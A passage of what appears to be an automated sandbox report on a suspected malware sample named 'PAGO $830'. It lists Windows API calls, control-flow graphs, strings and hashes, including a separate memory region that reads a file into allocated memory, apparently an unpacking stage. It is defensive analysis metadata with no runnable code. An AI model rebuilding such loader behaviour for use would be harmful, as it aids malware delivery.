                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                          • String ID:
                                                          • API String ID: 2189390790-0
                                                          • Opcode ID: 4d6d202616a7d9f3fd289067ec534649d521c357378cf1050efec589f68cf4db
                                                          • Instruction ID: 8170bccc7238e01a02f3d271ceae8eca903c9d6960c306cf697f16f4d59e5f40
                                                          • Opcode Fuzzy Hash: 4d6d202616a7d9f3fd289067ec534649d521c357378cf1050efec589f68cf4db
                                                          • Instruction Fuzzy Hash: A732CF70604342AFD734DB24C844FAAB7E1BF45304F58C62DE59997291E770E984CBB2

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00D74732
                                                          • RegisterClassExW.USER32(00000030), ref: 00D7475C
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D7476D
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00D7478A
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D7479A
                                                          • LoadIconW.USER32(000000A9), ref: 00D747B0
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D747BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 793b47659d0fd7e10026aa026322fb579bad69a215f5faaedaada7992df4561a
                                                          • Instruction ID: 5d8220572719a17ab3814d2529bb2d158b55c0ec471e28d2526149f0db9d6b63
                                                          • Opcode Fuzzy Hash: 793b47659d0fd7e10026aa026322fb579bad69a215f5faaedaada7992df4561a
                                                          • Instruction Fuzzy Hash: 9921C3B5901318AFDF00DFA6E849BDDBBB4FB49701F10825AF611B62A0D7B14589CF91

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00DB033B: CreateFileW.KERNELBASE(00000000,00000000,?,00DB06A5,?,?,00000000,?,00DB06A5,00000000,0000000C), ref: 00DB0358
                                                          • GetLastError.KERNEL32 ref: 00DB0710
                                                          • __dosmaperr.LIBCMT ref: 00DB0717
                                                          • GetFileType.KERNELBASE(00000000), ref: 00DB0723
                                                          • GetLastError.KERNEL32 ref: 00DB072D
                                                          • __dosmaperr.LIBCMT ref: 00DB0736
                                                          • CloseHandle.KERNEL32(00000000), ref: 00DB0756
                                                          • CloseHandle.KERNEL32(?), ref: 00DB08A0
                                                          • GetLastError.KERNEL32 ref: 00DB08D2
                                                          • __dosmaperr.LIBCMT ref: 00DB08D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: H
                                                          • API String ID: 4237864984-2852464175
                                                          • Opcode ID: ea210d3378d70b1becb3bc0f9037949f00cac1a6b7aff7bcacde6c1af3b3cdcb
                                                          • Instruction ID: c76e3f12c377fd9a37f2665ad5c09311ee8bf5ce907d4b30c77fa20468addebd
                                                          • Opcode Fuzzy Hash: ea210d3378d70b1becb3bc0f9037949f00cac1a6b7aff7bcacde6c1af3b3cdcb
                                                          • Instruction Fuzzy Hash: 9EA10736A141449FDF19AF68D851BEE7FA0EB06320F180159F812EB391DB359917CBB1

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00D758E5: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E41418,?,00D748AA,?,?,?,00000000), ref: 00D75903
                                                            • Part of subcall function 00D74D82: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D74DA4
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D7545B
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DB3EEC
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DB3F2D
                                                          • RegCloseKey.ADVAPI32(?), ref: 00DB3F6F
                                                          • _wcslen.LIBCMT ref: 00DB3FD6
                                                          • _wcslen.LIBCMT ref: 00DB3FE5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 98802146-2727554177
                                                          • Opcode ID: 0eb73178c0c9846327af2665c914888e4e547d882de2f47eb637fe6f844afc6c
                                                          • Instruction ID: 904703ef30f3108ce90cab3416b2db41f353619aa346077ccee353500ddb7485
                                                          • Opcode Fuzzy Hash: 0eb73178c0c9846327af2665c914888e4e547d882de2f47eb637fe6f844afc6c
                                                          • Instruction Fuzzy Hash: 287195715043019EC304EF66DC819ABBBF8FF96740F84452EF649A31A1EB709949CB72

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00D745B9
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00D745C8
                                                          • LoadIconW.USER32(00000063), ref: 00D745DE
                                                          • LoadIconW.USER32(000000A4), ref: 00D745F0
                                                          • LoadIconW.USER32(000000A2), ref: 00D74602
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D7461A
                                                          • RegisterClassExW.USER32(?), ref: 00D7466B
                                                            • Part of subcall function 00D746FF: GetSysColorBrush.USER32(0000000F), ref: 00D74732
                                                            • Part of subcall function 00D746FF: RegisterClassExW.USER32(00000030), ref: 00D7475C
                                                            • Part of subcall function 00D746FF: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D7476D
                                                            • Part of subcall function 00D746FF: InitCommonControlsEx.COMCTL32(?), ref: 00D7478A
                                                            • Part of subcall function 00D746FF: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D7479A
                                                            • Part of subcall function 00D746FF: LoadIconW.USER32(000000A9), ref: 00D747B0
                                                            • Part of subcall function 00D746FF: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D747BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: c10114f35ba59bbb02aa592eab4392f428909fdfa5faab2b0e657a3d20e35c81
                                                          • Instruction ID: 3a51c8d0c56b62998e718cc9047af63a8f48b08aa85afe13c95b53346c820bea
                                                          • Opcode Fuzzy Hash: c10114f35ba59bbb02aa592eab4392f428909fdfa5faab2b0e657a3d20e35c81
                                                          • Instruction Fuzzy Hash: 90216A78E40314AFCB009FA7EC45BA97FB4FB49B40F15009AE500B26A0D3B1058ACF90
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 00D7D44E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Init_thread_footer
                                                          • String ID: p#$p#$p#$p#$p%$p%$x#$x#
                                                          • API String ID: 1385522511-4136154834
                                                          • Opcode ID: 0e3e357f91bd6c67ce9e5053f4477dbb2b3bba14b139909070c28330d1b215e9
                                                          • Instruction ID: e566ff3ff02b90d34d7e54cd3c2cb87167adc6d232647315298dc9b4e015b3a8
                                                          • Opcode Fuzzy Hash: 0e3e357f91bd6c67ce9e5053f4477dbb2b3bba14b139909070c28330d1b215e9
                                                          • Instruction Fuzzy Hash: DE328B74A04206DFCB24CF54C884BBA7BB6EF45314F29805DE949AB251E774ED82CBB1

                                                          Control-flow Graph

                                                          control_flow_graph 716 d74b9b-d74bb0 717 d74bb2-d74bb5 716->717 718 d74c10-d74c12 716->718 720 d74bb7-d74bbe 717->720 721 d74c16 717->721 718->717 719 d74c14 718->719 722 d74bfb-d74c03 DefWindowProcW 719->722 725 d74bc4-d74bc9 720->725 726 d74c90-d74c98 PostQuitMessage 720->726 723 db39dd-db3a05 call d731ed call d8e48c 721->723 724 d74c1c-d74c21 721->724 727 d74c09-d74c0f 722->727 758 db3a0a-db3a11 723->758 729 d74c23-d74c26 724->729 730 d74c48-d74c6f SetTimer RegisterWindowMessageW 724->730 732 db3a5e-db3a72 call ddbe4e 725->732 733 d74bcf-d74bd3 725->733 728 d74c44-d74c46 726->728 728->727 734 db397e-db3981 729->734 735 d74c2c-d74c3f KillTimer call d74b1d call d75adb 729->735 730->728 737 d74c71-d74c7c CreatePopupMenu 730->737 732->728 749 db3a78 732->749 738 db3a4a-db3a59 call ddc07f 733->738 739 d74bd9-d74bde 733->739 741 db39b9-db39d8 MoveWindow 734->741 742 db3983-db3987 734->742 735->728 737->728 738->728 746 d74be4-d74be9 739->746 747 db3a2f-db3a36 739->747 741->728 750 db3989-db398c 742->750 751 db39a8-db39b4 SetFocus 742->751 756 d74bef-d74bf5 746->756 757 d74c7e-d74c8e call d74c9a 746->757 747->722 752 db3a3c-db3a45 call dd0a1b 747->752 749->722 750->756 759 db3992-db39a3 call d731ed 750->759 751->728 752->722 756->722 756->758 757->728 758->722 764 db3a17-db3a2a call d74b1d call d756c2 758->764 759->728 764->722
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D74B95,?,?), ref: 00D74C03
                                                          • KillTimer.USER32(?,00000001,?,?,?,?,?,00D74B95,?,?), ref: 00D74C2F
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D74C52
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D74B95,?,?), ref: 00D74C5D
                                                          • CreatePopupMenu.USER32 ref: 00D74C71
                                                          • PostQuitMessage.USER32(00000000), ref: 00D74C92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated
                                                          • API String ID: 129472671-2362178303
                                                          • Opcode ID: 63713a18d09022743cc39e0a1cadf7f0207b4566bcbf3cbc579e3478d9155489
                                                          • Instruction ID: 4464c925bacc6538c4745ebcfdea8351af7d577c206dcabf5fd1e5625541e237
                                                          • Opcode Fuzzy Hash: 63713a18d09022743cc39e0a1cadf7f0207b4566bcbf3cbc579e3478d9155489
                                                          • Instruction Fuzzy Hash: 9B415834244104AFDF1B1F3D9D0ABB83A15EB45340F2C8266F55EA62A0EB71CD859B72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: D%$D%$D%$D%$D%$Variable must be of type 'Object'.
                                                          • API String ID: 0-2799515523
                                                          • Opcode ID: 0f2023bc71229f5490ac2abbbcb104603dcadcd1e4b13178a98e5f67ccb8758e
                                                          • Instruction ID: 373e9909c49d77660e4ff0e137b894fb470c23ca6f51de8fef9af21004244f12
                                                          • Opcode Fuzzy Hash: 0f2023bc71229f5490ac2abbbcb104603dcadcd1e4b13178a98e5f67ccb8758e
                                                          • Instruction Fuzzy Hash: 4EC27971A00205CFCB24DF58C895BADB7B1FF49310F28816AE949AB391E375AD45CBB1

                                                          Control-flow Graph

                                                          control_flow_graph 1282 13c1048-13c10f6 call 13bea58 1285 13c10fd-13c1123 call 13c1f58 CreateFileW 1282->1285 1288 13c112a-13c113a 1285->1288 1289 13c1125 1285->1289 1296 13c113c 1288->1296 1297 13c1141-13c115b VirtualAlloc 1288->1297 1290 13c1275-13c1279 1289->1290 1291 13c12bb-13c12be 1290->1291 1292 13c127b-13c127f 1290->1292 1298 13c12c1-13c12c8 1291->1298 1294 13c128b-13c128f 1292->1294 1295 13c1281-13c1284 1292->1295 1299 13c129f-13c12a3 1294->1299 1300 13c1291-13c129b 1294->1300 1295->1294 1296->1290 1301 13c115d 1297->1301 1302 13c1162-13c1179 ReadFile 1297->1302 1303 13c131d-13c1332 1298->1303 1304 13c12ca-13c12d5 1298->1304 1309 13c12a5-13c12af 1299->1309 1310 13c12b3 1299->1310 1300->1299 1301->1290 1311 13c117b 1302->1311 1312 13c1180-13c11c0 VirtualAlloc 1302->1312 1307 13c1334-13c133f VirtualFree 1303->1307 1308 13c1342-13c134a 1303->1308 1305 13c12d9-13c12e5 1304->1305 1306 13c12d7 1304->1306 1313 13c12f9-13c1305 1305->1313 1314 13c12e7-13c12f7 1305->1314 1306->1303 1307->1308 1309->1310 1310->1291 1311->1290 1315 13c11c7-13c11e2 call 13c21a8 1312->1315 1316 13c11c2 1312->1316 1319 13c1307-13c1310 1313->1319 1320 13c1312-13c1318 1313->1320 1318 13c131b 1314->1318 1322 13c11ed-13c11f7 1315->1322 1316->1290 1318->1298 1319->1318 1320->1318 1323 13c11f9-13c1228 call 13c21a8 1322->1323 1324 13c122a-13c123e call 13c1fb8 1322->1324 1323->1322 1330 13c1240 1324->1330 1331 13c1242-13c1246 1324->1331 1330->1290 1332 13c1248-13c124c CloseHandle 1331->1332 1333 13c1252-13c1256 1331->1333 1332->1333 1334 13c1258-13c1263 VirtualFree 1333->1334 1335 13c1266-13c126f 1333->1335 1334->1335 1335->1285 1335->1290
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 013C1119
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 013C133F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateFileFreeVirtual
                                                          • String ID:
                                                          • API String ID: 204039940-0
                                                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                          • Instruction ID: f263bf7aee1094af73e29732c74c659f40a83b7a71d8b7f75ff0dad458310385
                                                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                          • Instruction Fuzzy Hash: 07A1F974E00209EBDF14CFA4C894BEEBBB5BF48708F208159E615BB281D7759E41DB54

                                                          Control-flow Graph

                                                          control_flow_graph 1346 d7468e-d746fe CreateWindowExW * 2 ShowWindow * 2
                                                          APIs
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D746BC
                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D746DD
                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D736D8,?), ref: 00D746F1
                                                          • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D736D8,?), ref: 00D746FA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Window$CreateShow
                                                          • String ID: AutoIt v3$edit
                                                          • API String ID: 1584632944-3779509399
                                                          • Opcode ID: 3493e0fcfee4e95b7f5de985d09b8b58334ea3ad0ab2ee5cda75f78867a5e0b6
                                                          • Instruction ID: 1aa6cb56de55ffce0d0e474eb9d0151285b026f05b8252cc265afc9712e38d40
                                                          • Opcode Fuzzy Hash: 3493e0fcfee4e95b7f5de985d09b8b58334ea3ad0ab2ee5cda75f78867a5e0b6
                                                          • Instruction Fuzzy Hash: BDF0D0799403907EEF311B27AC09E7B2EBDD7C7F50B15009AF904B25A0C661189ADA70

                                                          Control-flow Graph

                                                          control_flow_graph 1461 13c0e08-13c0f47 call 13bea58 call 13c0cf8 CreateFileW 1468 13c0f4e-13c0f5e 1461->1468 1469 13c0f49 1461->1469 1472 13c0f65-13c0f7f VirtualAlloc 1468->1472 1473 13c0f60 1468->1473 1470 13c0ffe-13c1003 1469->1470 1474 13c0f81 1472->1474 1475 13c0f83-13c0f9a ReadFile 1472->1475 1473->1470 1474->1470 1476 13c0f9c 1475->1476 1477 13c0f9e-13c0fd8 call 13c0d38 call 13bfcf8 1475->1477 1476->1470 1482 13c0fda-13c0fef call 13c0d88 1477->1482 1483 13c0ff4-13c0ffc ExitProcess 1477->1483 1482->1483 1483->1470
                                                          APIs
                                                            • Part of subcall function 013C0CF8: Sleep.KERNELBASE(000001F4), ref: 013C0D09
                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 013C0F3D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateFileSleep
                                                          • String ID: XGQYZ2O4Y0PQZI525XLHBZX3CN04CB
                                                          • API String ID: 2694422964-3263489077
                                                          • Opcode ID: 5f05079814dbf193bf6b722ae298860c964ebb340bc594f08d4dd5acff1f8ed4
                                                          • Instruction ID: 53d3387c70cf77a5650ceba6ad0b15fec8fad1d0feca1cf2f927ff85bcff700a
                                                          • Opcode Fuzzy Hash: 5f05079814dbf193bf6b722ae298860c964ebb340bc594f08d4dd5acff1f8ed4
                                                          • Instruction Fuzzy Hash: 45618530D0428DDAEF12D7B8C858BDEBBB9AF15704F044199E6487B2C1C7B91B89CB65

                                                          Control-flow Graph

                                                          control_flow_graph 1485 de2865-de28d7 call db1ef0 call de24f4 call d8fd8b call d770c2 call de266c call d76abf call d951c2 1500 de28dd-de28e4 call de2d84 1485->1500 1501 de298a-de2991 call de2d84 1485->1501 1506 de28ea-de2988 call d9d513 call d94913 call d98fc8 call d9d513 call d98fc8 * 2 1500->1506 1507 de2993-de2995 1500->1507 1501->1507 1508 de299a 1501->1508 1511 de299d-de2a58 call d76a95 * 8 call de2f35 call d9e57b 1506->1511 1510 de2bd4-de2bd5 1507->1510 1508->1511 1512 de2bf3-de2bf9 1510->1512 1550 de2a5a-de2a5c 1511->1550 1551 de2a61-de2a7c call de26b0 1511->1551 1515 de2c0e-de2c14 1512->1515 1516 de2bfb-de2c0b call d8fd4d call d8fd94 1512->1516 1516->1515 1550->1510 1554 de2b0e-de2b1a call d9e608 1551->1554 1555 de2a82-de2a8a 1551->1555 1562 de2b1c-de2b2b DeleteFileW 1554->1562 1563 de2b30-de2b34 1554->1563 1556 de2a8c-de2a90 1555->1556 1557 de2a92 1555->1557 1559 de2a97-de2ab5 call d76a95 1556->1559 1557->1559 1569 de2adf-de2af5 call de203b call d9db43 1559->1569 1570 de2ab7-de2abc 1559->1570 1562->1510 1565 de2baf-de2bc3 CopyFileW 1563->1565 1566 de2b36-de2b9c call de24f4 call d9d27b * 2 call de21ec 1563->1566 1567 de2bd7-de2bed DeleteFileW call de2ef6 1565->1567 1568 de2bc5-de2bd2 DeleteFileW 1565->1568 1566->1567 1590 de2b9e-de2bad DeleteFileW 1566->1590 1576 de2bf2 1567->1576 1568->1510 1585 de2afa-de2b05 1569->1585 1573 de2abf-de2ad2 call de27f0 1570->1573 1583 de2ad4-de2add 1573->1583 1576->1512 1583->1569 1585->1555 1587 de2b0b 1585->1587 1587->1554 1590->1510
                                                          APIs
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2B23
                                                          • DeleteFileW.KERNEL32(?), ref: 00DE2BA5
                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DE2BBB
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2BCC
                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DE2BDE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$Copy
                                                          • String ID:
                                                          • API String ID: 3226157194-0
                                                          • Opcode ID: b869319240a59c072fe6da60a41b939e6b882a848f0cf5917a97dde1832222e9
                                                          • Instruction ID: 867f58dfcb6c04e863d5140555436838e4acd572b299c5cc678637eb9b8322c0
                                                          • Opcode Fuzzy Hash: b869319240a59c072fe6da60a41b939e6b882a848f0cf5917a97dde1832222e9
                                                          • Instruction Fuzzy Hash: 8EB16071900219ABDF25EFA5CC85EEEB7BDEF49310F1440A6F609E6145EA30AA44CF71

                                                          Control-flow Graph

                                                          control_flow_graph 1865 d759a7-d759b2 1866 d75a24-d75a26 1865->1866 1867 d759b4-d759b9 1865->1867 1869 d75a17-d75a1a 1866->1869 1867->1866 1868 d759bb-d759d3 RegOpenKeyExW 1867->1868 1868->1866 1870 d759d5-d759f4 RegQueryValueExW 1868->1870 1871 d759f6-d75a01 1870->1871 1872 d75a0b-d75a16 RegCloseKey 1870->1872 1873 d75a03-d75a05 1871->1873 1874 d75a1b-d75a22 1871->1874 1872->1869 1875 d75a09 1873->1875 1874->1875 1875->1872
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D7599A,SwapMouseButtons,00000004,?), ref: 00D759CB
                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D7599A,SwapMouseButtons,00000004,?), ref: 00D759EC
                                                          • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D7599A,SwapMouseButtons,00000004,?), ref: 00D75A0E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
